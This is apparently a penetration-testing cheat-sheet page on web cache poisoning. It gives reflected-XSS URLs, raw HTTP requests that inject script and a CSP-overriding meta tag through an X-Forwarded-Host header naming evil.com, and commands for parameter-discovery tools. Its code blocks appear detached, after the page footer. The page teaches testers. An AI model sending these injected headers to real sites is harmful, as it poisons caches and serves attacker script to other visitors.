Web Cache Poisoning

General

Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.

Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.

A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.

Web Cache Poisoning

Reflected XSS with Cache Poisoning

If the website reflects our arbitrary path in the result such as below.

https://example.com/xyz

# Output in the 404 page
Page not found: /xyz

We may try XSS as below.

https://example.com/xyz<script>alert(1)</script>

If we use Burp Repeater to send the request above, the URL won't be normalized so leads the reflected XSS. Then the cache will be poisoned. In this state, if you ask the victim to visit this URL, they will see this cached result. In other words, the reflected XSS is performed despite URL normalization in the victim's web browsers.

Meta Tag XSS

Exploit

Meta Tag CSP Overriding

If the website sets CSP (Content-Security-Policy) using meta tag, we can override this CSP settings by cache poisoning, then we can bypass CSP and may cause other attacks.

References

Tools

PreviousCSRF (Cross-Site Request Forgery)NextClickjacking

Last updated 1 month ago

GET /?id=1 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com/example.jpg" />

GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com"><script>alert(1)</script>
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/evil.com"><script>alert(1)</script>" />

GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">

# https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
wcvs -u https://url.com
# https://github.com/s0md3v/Arjun
python3 arjun.py -u https://url.com --get 
python3 arjun.py -u https://url.com --post
# https://github.com/maK-/parameth
python parameth.py -u https://example.com/test.php
# https://github.com/devanshbatham/ParamSpider
python3 paramspider.py --domain example.com
# https://github.com/s0md3v/Parth
python3 parth.py -t example.com